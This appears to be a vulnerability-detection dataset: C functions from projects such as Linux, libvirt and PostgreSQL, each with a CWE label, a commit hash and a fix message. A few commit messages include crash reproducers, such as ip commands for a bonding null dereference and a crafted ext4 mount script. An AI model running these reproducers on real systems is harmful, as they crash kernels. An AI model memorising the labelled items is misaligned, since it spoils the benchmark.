val->intval = POWER_SUPPLY_SCOPE_DEVICE;
break;
default:
ret = -EINVAL;
break;
}
return ret;
}
| 0 |
[
"CWE-787"
] |
linux
|
35556bed836f8dc07ac55f69c8d17dce3e7f0e25
| 287,557,949,231,494,500,000,000,000,000,000,000,000 | 61 |
HID: core: Sanitize event code and type when mapping input
When calling into hid_map_usage(), the passed event code is
blindly stored as is, even if it doesn't fit in the associated bitmap.
This event code can come from a variety of sources, including devices
masquerading as input devices, only a bit more "programmable".
Instead of taking the event code at face value, check that it actually
fits the corresponding bitmap, and if it doesn't:
- spit out a warning so that we know which device is acting up
- NULLify the bitmap pointer so that we catch unexpected uses
Code paths that can make use of untrusted inputs can now check
that the mapping was indeed correct and bail out if not.
Cc: [email protected]
Signed-off-by: Marc Zyngier <[email protected]>
Signed-off-by: Benjamin Tissoires <[email protected]>
|
static struct slave *bond_get_slave_by_id(struct bonding *bond,
int slave_id)
{
struct list_head *iter;
struct slave *slave;
int i = slave_id;
/* Here we start from the slave with slave_id */
bond_for_each_slave_rcu(bond, slave, iter) {
if (--i < 0) {
if (bond_slave_can_tx(slave))
return slave;
}
}
/* Here we start from the first slave up to slave_id */
i = slave_id;
bond_for_each_slave_rcu(bond, slave, iter) {
if (--i < 0)
break;
if (bond_slave_can_tx(slave))
return slave;
}
/* no slave that can tx has been found */
return NULL;
}
| 0 |
[
"CWE-476",
"CWE-703"
] |
linux
|
105cd17a866017b45f3c45901b394c711c97bf40
| 111,243,842,987,594,160,000,000,000,000,000,000,000 | 26 |
bonding: fix null dereference in bond_ipsec_add_sa()
If bond doesn't have real device, bond->curr_active_slave is null.
But bond_ipsec_add_sa() dereferences bond->curr_active_slave without
null checking.
So, null-ptr-deref would occur.
Test commands:
ip link add bond0 type bond
ip link set bond0 up
ip x s add proto esp dst 14.1.1.1 src 15.1.1.1 spi \
0x07 mode transport reqid 0x07 replay-window 32 aead 'rfc4106(gcm(aes))' \
0x44434241343332312423222114131211f4f3f2f1 128 sel src 14.0.0.52/24 \
dst 14.0.0.70/24 proto tcp offload dev bond0 dir in
Splat looks like:
KASAN: null-ptr-deref in range [0x0000000000000000-0x0000000000000007]
CPU: 4 PID: 680 Comm: ip Not tainted 5.13.0-rc3+ #1168
RIP: 0010:bond_ipsec_add_sa+0xc4/0x2e0 [bonding]
Code: 85 21 02 00 00 4d 8b a6 48 0c 00 00 e8 75 58 44 ce 85 c0 0f 85 14
01 00 00 48 b8 00 00 00 00 00 fc ff df 4c 89 e2 48 c1 ea 03 <80> 3c 02
00 0f 85 fc 01 00 00 48 8d bb e0 02 00 00 4d 8b 2c 24 48
RSP: 0018:ffff88810946f508 EFLAGS: 00010246
RAX: dffffc0000000000 RBX: ffff88810b4e8040 RCX: 0000000000000001
RDX: 0000000000000000 RSI: ffffffff8fe34280 RDI: ffff888115abe100
RBP: ffff88810946f528 R08: 0000000000000003 R09: fffffbfff2287e11
R10: 0000000000000001 R11: ffff888115abe0c8 R12: 0000000000000000
R13: ffffffffc0aea9a0 R14: ffff88800d7d2000 R15: ffff88810b4e8330
FS: 00007efc5552e680(0000) GS:ffff888119c00000(0000)
knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 000055c2530dbf40 CR3: 0000000103056004 CR4: 00000000003706e0
DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
Call Trace:
xfrm_dev_state_add+0x2a9/0x770
? memcpy+0x38/0x60
xfrm_add_sa+0x2278/0x3b10 [xfrm_user]
? xfrm_get_policy+0xaa0/0xaa0 [xfrm_user]
? register_lock_class+0x1750/0x1750
xfrm_user_rcv_msg+0x331/0x660 [xfrm_user]
? rcu_read_lock_sched_held+0x91/0xc0
? xfrm_user_state_lookup.constprop.39+0x320/0x320 [xfrm_user]
? find_held_lock+0x3a/0x1c0
? mutex_lock_io_nested+0x1210/0x1210
? sched_clock_cpu+0x18/0x170
netlink_rcv_skb+0x121/0x350
? xfrm_user_state_lookup.constprop.39+0x320/0x320 [xfrm_user]
? netlink_ack+0x9d0/0x9d0
? netlink_deliver_tap+0x17c/0xa50
xfrm_netlink_rcv+0x68/0x80 [xfrm_user]
netlink_unicast+0x41c/0x610
? netlink_attachskb+0x710/0x710
netlink_sendmsg+0x6b9/0xb70
[ ...]
Fixes: 18cb261afd7b ("bonding: support hardware encryption offload to slaves")
Signed-off-by: Taehee Yoo <[email protected]>
Signed-off-by: David S. Miller <[email protected]>
|
virDomainMemoryDefParseXML(virDomainXMLOptionPtr xmlopt,
xmlNodePtr memdevNode,
xmlXPathContextPtr ctxt,
const virDomainDef *dom,
unsigned int flags)
{
VIR_XPATH_NODE_AUTORESTORE(ctxt);
xmlNodePtr node;
virDomainMemoryDefPtr def;
int val;
g_autofree char *tmp = NULL;
if (VIR_ALLOC(def) < 0)
return NULL;
ctxt->node = memdevNode;
if (!(tmp = virXMLPropString(memdevNode, "model"))) {
virReportError(VIR_ERR_XML_ERROR, "%s",
_("missing memory model"));
goto error;
}
if ((def->model = virDomainMemoryModelTypeFromString(tmp)) <= 0) {
virReportError(VIR_ERR_XML_ERROR,
_("invalid memory model '%s'"), tmp);
goto error;
}
VIR_FREE(tmp);
if ((tmp = virXMLPropString(memdevNode, "access"))) {
if ((val = virDomainMemoryAccessTypeFromString(tmp)) <= 0) {
virReportError(VIR_ERR_XML_ERROR,
_("invalid access mode '%s'"), tmp);
goto error;
}
def->access = val;
}
VIR_FREE(tmp);
if ((tmp = virXMLPropString(memdevNode, "discard"))) {
if ((val = virTristateBoolTypeFromString(tmp)) <= 0) {
virReportError(VIR_ERR_XML_ERROR,
_("invalid discard value '%s'"), tmp);
goto error;
}
def->discard = val;
}
VIR_FREE(tmp);
if (def->model == VIR_DOMAIN_MEMORY_MODEL_NVDIMM &&
ARCH_IS_PPC64(dom->os.arch)) {
/* Extract nvdimm uuid or generate a new one */
tmp = virXPathString("string(./uuid[1])", ctxt);
if (!tmp) {
if (virUUIDGenerate(def->uuid) < 0) {
virReportError(VIR_ERR_INTERNAL_ERROR,
"%s", _("Failed to generate UUID"));
goto error;
}
} else if (virUUIDParse(tmp, def->uuid) < 0) {
virReportError(VIR_ERR_INTERNAL_ERROR,
"%s", _("malformed uuid element"));
goto error;
}
}
/* source */
if ((node = virXPathNode("./source", ctxt)) &&
virDomainMemorySourceDefParseXML(node, ctxt, def) < 0)
goto error;
/* target */
if (!(node = virXPathNode("./target", ctxt))) {
virReportError(VIR_ERR_XML_ERROR, "%s",
_("missing <target> element for <memory> device"));
goto error;
}
if (virDomainMemoryTargetDefParseXML(node, ctxt, def) < 0)
goto error;
if (virDomainDeviceInfoParseXML(xmlopt, memdevNode,
&def->info, flags) < 0)
goto error;
return def;
error:
virDomainMemoryDefFree(def);
return NULL;
}
| 0 |
[
"CWE-212"
] |
libvirt
|
a5b064bf4b17a9884d7d361733737fb614ad8979
| 326,886,909,769,779,960,000,000,000,000,000,000,000 | 95 |
conf: Don't format http cookies unless VIR_DOMAIN_DEF_FORMAT_SECURE is used
Starting with 3b076391befc3fe72deb0c244ac6c2b4c100b410
(v6.1.0-122-g3b076391be) we support http cookies. Since they may contain
somewhat sensitive information we should not format them into the XML
unless VIR_DOMAIN_DEF_FORMAT_SECURE is asserted.
Reported-by: Han Han <[email protected]>
Signed-off-by: Peter Krempa <[email protected]>
Reviewed-by: Erik Skultety <[email protected]>
|
int LibRaw::dcraw_ppm_tiff_writer(const char *filename)
{
CHECK_ORDER_LOW(LIBRAW_PROGRESS_LOAD_RAW);
if(!imgdata.image)
return LIBRAW_OUT_OF_ORDER_CALL;
if(!filename)
return ENOENT;
FILE *f = fopen(filename,"wb");
if(!f)
return errno;
try {
if(!libraw_internal_data.output_data.histogram)
{
libraw_internal_data.output_data.histogram =
(int (*)[LIBRAW_HISTOGRAM_SIZE]) malloc(sizeof(*libraw_internal_data.output_data.histogram)*4);
merror(libraw_internal_data.output_data.histogram,"LibRaw::dcraw_ppm_tiff_writer()");
}
libraw_internal_data.internal_data.output = f;
write_ppm_tiff();
SET_PROC_FLAG(LIBRAW_PROGRESS_FLIP);
libraw_internal_data.internal_data.output = NULL;
fclose(f);
return 0;
}
catch ( LibRaw_exceptions err) {
fclose(f);
EXCEPTION_HANDLER(err);
}
}
| 0 |
[
"CWE-129"
] |
LibRaw
|
89d065424f09b788f443734d44857289489ca9e2
| 285,835,461,725,359,320,000,000,000,000,000,000,000 | 33 |
fixed two more problems found by fuzzer
|
static ssize_t ext4_ui_proc_write(struct file *file, const char __user *buf,
size_t cnt, loff_t *ppos)
{
unsigned long *p = PDE(file->f_path.dentry->d_inode)->data;
char str[32];
if (cnt >= sizeof(str))
return -EINVAL;
if (copy_from_user(str, buf, cnt))
return -EFAULT;
*p = simple_strtoul(str, NULL, 0);
return cnt;
}
| 0 |
[
"CWE-20"
] |
linux-2.6
|
4ec110281379826c5cf6ed14735e47027c3c5765
| 18,296,928,070,590,842,000,000,000,000,000,000,000 | 14 |
ext4: Add sanity checks for the superblock before mounting the filesystem
This avoids insane superblock configurations that could lead to kernel
oops due to null pointer derefences.
http://bugzilla.kernel.org/show_bug.cgi?id=12371
Thanks to David Maciejak at Fortinet's FortiGuard Global Security
Research Team who discovered this bug independently (but at
approximately the same time) as Thiemo Nagel, who submitted the patch.
Signed-off-by: Thiemo Nagel <[email protected]>
Signed-off-by: "Theodore Ts'o" <[email protected]>
Cc: [email protected]
|
template<typename T>
inline T pow3(const T& val) {
return val*val*val;
| 0 |
[
"CWE-119",
"CWE-787"
] |
CImg
|
ac8003393569aba51048c9d67e1491559877b1d1
| 54,208,983,422,446,720,000,000,000,000,000,000,000 | 3 |
.
|
bool ipv6_chk_custom_prefix(const struct in6_addr *addr,
const unsigned int prefix_len, struct net_device *dev)
{
struct inet6_dev *idev;
struct inet6_ifaddr *ifa;
bool ret = false;
rcu_read_lock();
idev = __in6_dev_get(dev);
if (idev) {
read_lock_bh(&idev->lock);
list_for_each_entry(ifa, &idev->addr_list, if_list) {
ret = ipv6_prefix_equal(addr, &ifa->addr, prefix_len);
if (ret)
break;
}
read_unlock_bh(&idev->lock);
}
rcu_read_unlock();
return ret;
}
| 0 |
[
"CWE-20"
] |
linux
|
77751427a1ff25b27d47a4c36b12c3c8667855ac
| 102,611,992,002,814,720,000,000,000,000,000,000,000 | 22 |
ipv6: addrconf: validate new MTU before applying it
Currently we don't check if the new MTU is valid or not and this allows
one to configure a smaller than minimum allowed by RFCs or even bigger
than interface own MTU, which is a problem as it may lead to packet
drops.
If you have a daemon like NetworkManager running, this may be exploited
by remote attackers by forging RA packets with an invalid MTU, possibly
leading to a DoS. (NetworkManager currently only validates for values
too small, but not for too big ones.)
The fix is just to make sure the new value is valid. That is, between
IPV6_MIN_MTU and interface's MTU.
Note that similar check is already performed at
ndisc_router_discovery(), for when kernel itself parses the RA.
Signed-off-by: Marcelo Ricardo Leitner <[email protected]>
Signed-off-by: Sabrina Dubroca <[email protected]>
Signed-off-by: David S. Miller <[email protected]>
|
static void nf_conntrack_pernet_exit(struct list_head *net_exit_list)
{
struct net *net;
list_for_each_entry(net, net_exit_list, exit_list)
nf_conntrack_fini_net(net);
nf_conntrack_cleanup_net_list(net_exit_list);
}
| 0 |
[
"CWE-203"
] |
linux
|
2671fa4dc0109d3fb581bc3078fdf17b5d9080f6
| 249,286,094,008,934,250,000,000,000,000,000,000,000 | 9 |
netfilter: conntrack: Make global sysctls readonly in non-init netns
These sysctls point to global variables:
- NF_SYSCTL_CT_MAX (&nf_conntrack_max)
- NF_SYSCTL_CT_EXPECT_MAX (&nf_ct_expect_max)
- NF_SYSCTL_CT_BUCKETS (&nf_conntrack_htable_size_user)
Because their data pointers are not updated to point to per-netns
structures, they must be marked read-only in a non-init_net ns.
Otherwise, changes in any net namespace are reflected in (leaked into)
all other net namespaces. This problem has existed since the
introduction of net namespaces.
The current logic marks them read-only only if the net namespace is
owned by an unprivileged user (other than init_user_ns).
Commit d0febd81ae77 ("netfilter: conntrack: re-visit sysctls in
unprivileged namespaces") "exposes all sysctls even if the namespace is
unpriviliged." Since we need to mark them readonly in any case, we can
forego the unprivileged user check altogether.
Fixes: d0febd81ae77 ("netfilter: conntrack: re-visit sysctls in unprivileged namespaces")
Signed-off-by: Jonathon Reinhart <[email protected]>
Signed-off-by: David S. Miller <[email protected]>
|
static int snd_usb_pcm_close(struct snd_pcm_substream *substream, int direction)
{
struct snd_usb_stream *as = snd_pcm_substream_chip(substream);
struct snd_usb_substream *subs = &as->substream[direction];
stop_endpoints(subs, true);
if (subs->interface >= 0 &&
!snd_usb_lock_shutdown(subs->stream->chip)) {
usb_set_interface(subs->dev, subs->interface, 0);
subs->interface = -1;
snd_usb_unlock_shutdown(subs->stream->chip);
}
subs->pcm_substream = NULL;
snd_usb_autosuspend(subs->stream->chip);
return 0;
}
| 0 |
[] |
sound
|
447d6275f0c21f6cc97a88b3a0c601436a4cdf2a
| 56,722,150,290,670,430,000,000,000,000,000,000,000 | 19 |
ALSA: usb-audio: Add sanity checks for endpoint accesses
Add some sanity check codes before actually accessing the endpoint via
get_endpoint() in order to avoid the invalid access through a
malformed USB descriptor. Mostly just checking bNumEndpoints, but in
one place (snd_microii_spdif_default_get()), the validity of iface and
altsetting index is checked as well.
Bugzilla: https://bugzilla.suse.com/show_bug.cgi?id=971125
Cc: <[email protected]>
Signed-off-by: Takashi Iwai <[email protected]>
|
_equalCoerceToDomain(const CoerceToDomain *a, const CoerceToDomain *b)
{
COMPARE_NODE_FIELD(arg);
COMPARE_SCALAR_FIELD(resulttype);
COMPARE_SCALAR_FIELD(resulttypmod);
COMPARE_SCALAR_FIELD(resultcollid);
COMPARE_COERCIONFORM_FIELD(coercionformat);
COMPARE_LOCATION_FIELD(location);
return true;
}
| 0 |
[
"CWE-362"
] |
postgres
|
5f173040e324f6c2eebb90d86cf1b0cdb5890f0a
| 27,860,952,516,362,890,000,000,000,000,000,000,000 | 11 |
Avoid repeated name lookups during table and index DDL.
If the name lookups come to different conclusions due to concurrent
activity, we might perform some parts of the DDL on a different table
than other parts. At least in the case of CREATE INDEX, this can be
used to cause the permissions checks to be performed against a
different table than the index creation, allowing for a privilege
escalation attack.
This changes the calling convention for DefineIndex, CreateTrigger,
transformIndexStmt, transformAlterTableStmt, CheckIndexCompatible
(in 9.2 and newer), and AlterTable (in 9.1 and older). In addition,
CheckRelationOwnership is removed in 9.2 and newer and the calling
convention is changed in older branches. A field has also been added
to the Constraint node (FkConstraint in 8.4). Third-party code calling
these functions or using the Constraint node will require updating.
Report by Andres Freund. Patch by Robert Haas and Andres Freund,
reviewed by Tom Lane.
Security: CVE-2014-0062
|
RetryStatePtr ProdFilter::createRetryState(const RetryPolicy& policy,
Http::RequestHeaderMap& request_headers,
const Upstream::ClusterInfo& cluster,
const VirtualCluster* vcluster, Runtime::Loader& runtime,
Random::RandomGenerator& random,
Event::Dispatcher& dispatcher, TimeSource& time_source,
Upstream::ResourcePriority priority) {
return RetryStateImpl::create(policy, request_headers, cluster, vcluster, runtime, random,
dispatcher, time_source, priority);
}
| 0 |
[
"CWE-703"
] |
envoy
|
18871dbfb168d3512a10c78dd267ff7c03f564c6
| 255,380,517,519,243,800,000,000,000,000,000,000,000 | 10 |
[1.18] CVE-2022-21655
Crash with direct_response
Signed-off-by: Otto van der Schaaf <[email protected]>
|
HBoundsCheck* UpperCheck() const { return upper_check_; }
| 0 |
[] |
node
|
fd80a31e0697d6317ce8c2d289575399f4e06d21
| 32,862,901,829,262,280,000,000,000,000,000,000,000 | 1 |
deps: backport 5f836c from v8 upstream
Original commit message:
Fix Hydrogen bounds check elimination
When combining bounds checks, they must all be moved before the first load/store
that they are guarding.
BUG=chromium:344186
LOG=y
[email protected]
Review URL: https://codereview.chromium.org/172093002
git-svn-id: https://v8.googlecode.com/svn/branches/bleeding_edge@19475 ce2b1a6d-e550-0410-aec6-3dcde31c8c00
fix #8070
|
timer_delete(timer_t timer_id)
{
struct itimerval timerval;
if (timer_id != 0)
return -1;
memset(&timerval, 0, sizeof(struct itimerval));
return setitimer(ITIMER_REAL, &timerval, NULL);
}
| 0 |
[
"CWE-416"
] |
owntone-server
|
246d8ae0cef27377e5dfe9ee3ad87e864d6b6266
| 94,218,656,136,403,260,000,000,000,000,000,000,000 | 11 |
[misc] Fix use-after-free in net_bind()
Thanks to Ba Jinsheng for reporting this bug
|
void analyzeUnitTest() {
struct ndpi_analyze_struct *s = ndpi_alloc_data_analysis(32);
u_int32_t i;
for(i=0; i<256; i++) {
ndpi_data_add_value(s, rand()*i);
// ndpi_data_add_value(s, i+1);
}
// ndpi_data_print_window_values(s);
#ifdef RUN_DATA_ANALYSIS_THEN_QUIT
printf("Average: [all: %f][window: %f]\n",
ndpi_data_average(s), ndpi_data_window_average(s));
printf("Entropy: %f\n", ndpi_data_entropy(s));
printf("Min/Max: %u/%u\n",
ndpi_data_min(s), ndpi_data_max(s));
#endif
ndpi_free_data_analysis(s);
#ifdef RUN_DATA_ANALYSIS_THEN_QUIT
exit(0);
#endif
}
| 0 |
[
"CWE-125"
] |
nDPI
|
b7e666e465f138ae48ab81976726e67deed12701
| 144,595,143,454,073,900,000,000,000,000,000,000,000 | 26 |
Added fix to avoid potential heap buffer overflow in H.323 dissector
Modified HTTP report information to make it closer to the HTTP field names
|
static int wcd9335_hw_params(struct snd_pcm_substream *substream,
struct snd_pcm_hw_params *params,
struct snd_soc_dai *dai)
{
struct wcd9335_codec *wcd;
int ret, tx_fs_rate = 0;
wcd = snd_soc_component_get_drvdata(dai->component);
switch (substream->stream) {
case SNDRV_PCM_STREAM_PLAYBACK:
ret = wcd9335_set_interpolator_rate(dai, params_rate(params));
if (ret) {
dev_err(wcd->dev, "cannot set sample rate: %u\n",
params_rate(params));
return ret;
}
switch (params_width(params)) {
case 16 ... 24:
wcd->dai[dai->id].sconfig.bps = params_width(params);
break;
default:
dev_err(wcd->dev, "%s: Invalid format 0x%x\n",
__func__, params_width(params));
return -EINVAL;
}
break;
case SNDRV_PCM_STREAM_CAPTURE:
switch (params_rate(params)) {
case 8000:
tx_fs_rate = 0;
break;
case 16000:
tx_fs_rate = 1;
break;
case 32000:
tx_fs_rate = 3;
break;
case 48000:
tx_fs_rate = 4;
break;
case 96000:
tx_fs_rate = 5;
break;
case 192000:
tx_fs_rate = 6;
break;
case 384000:
tx_fs_rate = 7;
break;
default:
dev_err(wcd->dev, "%s: Invalid TX sample rate: %d\n",
__func__, params_rate(params));
return -EINVAL;
};
ret = wcd9335_set_decimator_rate(dai, tx_fs_rate,
params_rate(params));
if (ret < 0) {
dev_err(wcd->dev, "Cannot set TX Decimator rate\n");
return ret;
}
switch (params_width(params)) {
case 16 ... 32:
wcd->dai[dai->id].sconfig.bps = params_width(params);
break;
default:
dev_err(wcd->dev, "%s: Invalid format 0x%x\n",
__func__, params_width(params));
return -EINVAL;
};
break;
default:
dev_err(wcd->dev, "Invalid stream type %d\n",
substream->stream);
return -EINVAL;
};
wcd->dai[dai->id].sconfig.rate = params_rate(params);
wcd9335_slim_set_hw_params(wcd, &wcd->dai[dai->id], substream->stream);
return 0;
}
| 0 |
[] |
sound
|
a54988113985ca22e414e132054f234fc8a92604
| 75,838,589,309,107,250,000,000,000,000,000,000,000 | 85 |
wcd9335: fix a incorrect use of kstrndup()
In wcd9335_codec_enable_dec(), 'widget_name' is allocated by kstrndup().
However, according to doc: "Note: Use kmemdup_nul() instead if the size
is known exactly." So we should use kmemdup_nul() here instead of
kstrndup().
Signed-off-by: Gen Zhang <[email protected]>
Signed-off-by: Mark Brown <[email protected]>
|
int mnt_fs_get_propagation(struct libmnt_fs *fs, unsigned long *flags)
{
if (!fs || !flags)
return -EINVAL;
*flags = 0;
if (!fs->opt_fields)
return 0;
/*
* The optional fields format is incompatible with mount options
* ... we have to parse the field here.
*/
*flags |= strstr(fs->opt_fields, "shared:") ? MS_SHARED : MS_PRIVATE;
if (strstr(fs->opt_fields, "master:"))
*flags |= MS_SLAVE;
if (strstr(fs->opt_fields, "unbindable"))
*flags |= MS_UNBINDABLE;
return 0;
}
| 0 |
[
"CWE-552",
"CWE-703"
] |
util-linux
|
166e87368ae88bf31112a30e078cceae637f4cdb
| 259,780,183,560,905,580,000,000,000,000,000,000,000 | 23 |
libmount: remove support for deleted mount table entries
The "(deleted)" suffix has been originally used by kernel for deleted
mountpoints. Since kernel commit 9d4d65748a5ca26ea8650e50ba521295549bf4e3
(Dec 2014) kernel does not use this suffix for mount stuff in /proc at
all. Let's remove this support from libmount too.
Signed-off-by: Karel Zak <[email protected]>
|
XISendDeviceHierarchyEvent(int flags[MAXDEVICES])
{
xXIHierarchyEvent *ev;
xXIHierarchyInfo *info;
DeviceIntRec dummyDev;
DeviceIntPtr dev;
int i;
if (!flags)
return;
ev = calloc(1, sizeof(xXIHierarchyEvent) +
MAXDEVICES * sizeof(xXIHierarchyInfo));
if (!ev)
return;
ev->type = GenericEvent;
ev->extension = IReqCode;
ev->evtype = XI_HierarchyChanged;
ev->time = GetTimeInMillis();
ev->flags = 0;
ev->num_info = inputInfo.numDevices;
info = (xXIHierarchyInfo *) &ev[1];
for (dev = inputInfo.devices; dev; dev = dev->next) {
info->deviceid = dev->id;
info->enabled = dev->enabled;
info->use = GetDeviceUse(dev, &info->attachment);
info->flags = flags[dev->id];
ev->flags |= info->flags;
info++;
}
for (dev = inputInfo.off_devices; dev; dev = dev->next) {
info->deviceid = dev->id;
info->enabled = dev->enabled;
info->use = GetDeviceUse(dev, &info->attachment);
info->flags = flags[dev->id];
ev->flags |= info->flags;
info++;
}
for (i = 0; i < MAXDEVICES; i++) {
if (flags[i] & (XIMasterRemoved | XISlaveRemoved)) {
info->deviceid = i;
info->enabled = FALSE;
info->flags = flags[i];
info->use = 0;
ev->flags |= info->flags;
ev->num_info++;
info++;
}
}
ev->length = bytes_to_int32(ev->num_info * sizeof(xXIHierarchyInfo));
memset(&dummyDev, 0, sizeof(dummyDev));
dummyDev.id = XIAllDevices;
dummyDev.type = SLAVE;
SendEventToAllWindows(&dummyDev, (XI_HierarchyChangedMask >> 8),
(xEvent *) ev, 1);
free(ev);
}
| 0 |
[
"CWE-191"
] |
xserver
|
c940cc8b6c0a2983c1ec974f1b3f019795dd4cff
| 141,164,826,481,603,020,000,000,000,000,000,000,000 | 61 |
Fix XIChangeHierarchy() integer underflow
CVE-2020-14346 / ZDI-CAN-11429
This vulnerability was discovered by:
Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
Signed-off-by: Matthieu Herrb <[email protected]>
|
void X509_STORE_CTX_set_time(X509_STORE_CTX *ctx, unsigned long flags, time_t t)
{
X509_VERIFY_PARAM_set_time(ctx->param, t);
}
| 0 |
[] |
openssl
|
d65b8b2162f33ac0d53dace588a0847ed827626c
| 93,473,631,747,698,120,000,000,000,000,000,000,000 | 4 |
Backport OCSP fixes.
|
ex_print(exarg_T *eap)
{
if (curbuf->b_ml.ml_flags & ML_EMPTY)
emsg(_(e_emptybuf));
else
{
for ( ;!got_int; ui_breakcheck())
{
print_line(eap->line1,
(eap->cmdidx == CMD_number || eap->cmdidx == CMD_pound
|| (eap->flags & EXFLAG_NR)),
eap->cmdidx == CMD_list || (eap->flags & EXFLAG_LIST));
if (++eap->line1 > eap->line2)
break;
out_flush(); // show one line at a time
}
setpcmark();
// put cursor at last line
curwin->w_cursor.lnum = eap->line2;
beginline(BL_SOL | BL_FIX);
}
ex_no_reprint = TRUE;
}
| 0 |
[
"CWE-122"
] |
vim
|
35a319b77f897744eec1155b736e9372c9c5575f
| 38,178,703,785,104,603,000,000,000,000,000,000,000 | 24 |
patch 8.2.3489: ml_get error after search with range
Problem: ml_get error after search with range.
Solution: Limit the line number to the buffer line count.
|
test_bson_copy_to_excluding_noinit (void)
{
bson_iter_t iter;
bool r;
bson_t b;
bson_t c;
int i;
bson_init (&b);
bson_append_int32 (&b, "a", 1, 1);
bson_append_int32 (&b, "b", 1, 2);
bson_init (&c);
bson_copy_to_excluding_noinit (&b, &c, "b", NULL);
r = bson_iter_init_find (&iter, &c, "a");
BSON_ASSERT (r);
r = bson_iter_init_find (&iter, &c, "b");
BSON_ASSERT (!r);
i = bson_count_keys (&b);
BSON_ASSERT_CMPINT (i, ==, 2);
i = bson_count_keys (&c);
BSON_ASSERT_CMPINT (i, ==, 1);
bson_destroy (&b);
bson_destroy (&c);
}
| 0 |
[
"CWE-125"
] |
libbson
|
42900956dc461dfe7fb91d93361d10737c1602b3
| 207,305,990,399,515,100,000,000,000,000,000,000,000 | 28 |
CDRIVER-2269 Check for zero string length in codewscope
|
static int ext4_check_descriptors(struct super_block *sb,
ext4_fsblk_t sb_block,
ext4_group_t *first_not_zeroed)
{
struct ext4_sb_info *sbi = EXT4_SB(sb);
ext4_fsblk_t first_block = le32_to_cpu(sbi->s_es->s_first_data_block);
ext4_fsblk_t last_block;
ext4_fsblk_t block_bitmap;
ext4_fsblk_t inode_bitmap;
ext4_fsblk_t inode_table;
int flexbg_flag = 0;
ext4_group_t i, grp = sbi->s_groups_count;
if (ext4_has_feature_flex_bg(sb))
flexbg_flag = 1;
ext4_debug("Checking group descriptors");
for (i = 0; i < sbi->s_groups_count; i++) {
struct ext4_group_desc *gdp = ext4_get_group_desc(sb, i, NULL);
if (i == sbi->s_groups_count - 1 || flexbg_flag)
last_block = ext4_blocks_count(sbi->s_es) - 1;
else
last_block = first_block +
(EXT4_BLOCKS_PER_GROUP(sb) - 1);
if ((grp == sbi->s_groups_count) &&
!(gdp->bg_flags & cpu_to_le16(EXT4_BG_INODE_ZEROED)))
grp = i;
block_bitmap = ext4_block_bitmap(sb, gdp);
if (block_bitmap == sb_block) {
ext4_msg(sb, KERN_ERR, "ext4_check_descriptors: "
"Block bitmap for group %u overlaps "
"superblock", i);
}
if (block_bitmap < first_block || block_bitmap > last_block) {
ext4_msg(sb, KERN_ERR, "ext4_check_descriptors: "
"Block bitmap for group %u not in group "
"(block %llu)!", i, block_bitmap);
return 0;
}
inode_bitmap = ext4_inode_bitmap(sb, gdp);
if (inode_bitmap == sb_block) {
ext4_msg(sb, KERN_ERR, "ext4_check_descriptors: "
"Inode bitmap for group %u overlaps "
"superblock", i);
}
if (inode_bitmap < first_block || inode_bitmap > last_block) {
ext4_msg(sb, KERN_ERR, "ext4_check_descriptors: "
"Inode bitmap for group %u not in group "
"(block %llu)!", i, inode_bitmap);
return 0;
}
inode_table = ext4_inode_table(sb, gdp);
if (inode_table == sb_block) {
ext4_msg(sb, KERN_ERR, "ext4_check_descriptors: "
"Inode table for group %u overlaps "
"superblock", i);
}
if (inode_table < first_block ||
inode_table + sbi->s_itb_per_group - 1 > last_block) {
ext4_msg(sb, KERN_ERR, "ext4_check_descriptors: "
"Inode table for group %u not in group "
"(block %llu)!", i, inode_table);
return 0;
}
ext4_lock_group(sb, i);
if (!ext4_group_desc_csum_verify(sb, i, gdp)) {
ext4_msg(sb, KERN_ERR, "ext4_check_descriptors: "
"Checksum for group %u failed (%u!=%u)",
i, le16_to_cpu(ext4_group_desc_csum(sb, i,
gdp)), le16_to_cpu(gdp->bg_checksum));
if (!(sb->s_flags & MS_RDONLY)) {
ext4_unlock_group(sb, i);
return 0;
}
}
ext4_unlock_group(sb, i);
if (!flexbg_flag)
first_block += EXT4_BLOCKS_PER_GROUP(sb);
}
if (NULL != first_not_zeroed)
*first_not_zeroed = grp;
return 1;
}
| 0 |
[
"CWE-125"
] |
linux
|
3a4b77cd47bb837b8557595ec7425f281f2ca1fe
| 50,693,497,686,709,500,000,000,000,000,000,000,000 | 87 |
ext4: validate s_first_meta_bg at mount time
Ralf Spenneberg reported that he hit a kernel crash when mounting a
modified ext4 image. And it turns out that kernel crashed when
calculating fs overhead (ext4_calculate_overhead()), this is because
the image has very large s_first_meta_bg (debug code shows it's
842150400), and ext4 overruns the memory in count_overhead() when
setting bitmap buffer, which is PAGE_SIZE.
ext4_calculate_overhead():
buf = get_zeroed_page(GFP_NOFS); <=== PAGE_SIZE buffer
blks = count_overhead(sb, i, buf);
count_overhead():
for (j = ext4_bg_num_gdb(sb, grp); j > 0; j--) { <=== j = 842150400
ext4_set_bit(EXT4_B2C(sbi, s++), buf); <=== buffer overrun
count++;
}
This can be reproduced easily for me by this script:
#!/bin/bash
rm -f fs.img
mkdir -p /mnt/ext4
fallocate -l 16M fs.img
mke2fs -t ext4 -O bigalloc,meta_bg,^resize_inode -F fs.img
debugfs -w -R "ssv first_meta_bg 842150400" fs.img
mount -o loop fs.img /mnt/ext4
Fix it by validating s_first_meta_bg first at mount time, and
refusing to mount if its value exceeds the largest possible meta_bg
number.
Reported-by: Ralf Spenneberg <[email protected]>
Signed-off-by: Eryu Guan <[email protected]>
Signed-off-by: Theodore Ts'o <[email protected]>
Reviewed-by: Andreas Dilger <[email protected]>
|
TEST_METHOD(10) {
// A Generation object returned by getNewestGeneration() doesn't delete
// the associated generation directory upon destruction.
ServerInstanceDir dir(parentDir + "/passenger-test.1234");
ServerInstanceDir::GenerationPtr generation = dir.newGeneration(true, "nobody", nobodyGroup, 0, 0);
ServerInstanceDir::GenerationPtr newestGeneration = dir.getNewestGeneration();
newestGeneration.reset();
ensure_equals(getFileType(generation->getPath()), FT_DIRECTORY);
}
| 0 |
[
"CWE-59",
"CWE-61"
] |
passenger
|
5483b3292cc2af1c83033eaaadec20dba4dcfd9b
| 52,161,328,329,777,700,000,000,000,000,000,000,000 | 9 |
If the server instance directory already exists, it is now removed first in order get correct directory permissions.
If the directory still exists after removal, Phusion Passenger aborts to avoid writing to a directory with unexpected permissions.
Fixes issue #910.
|
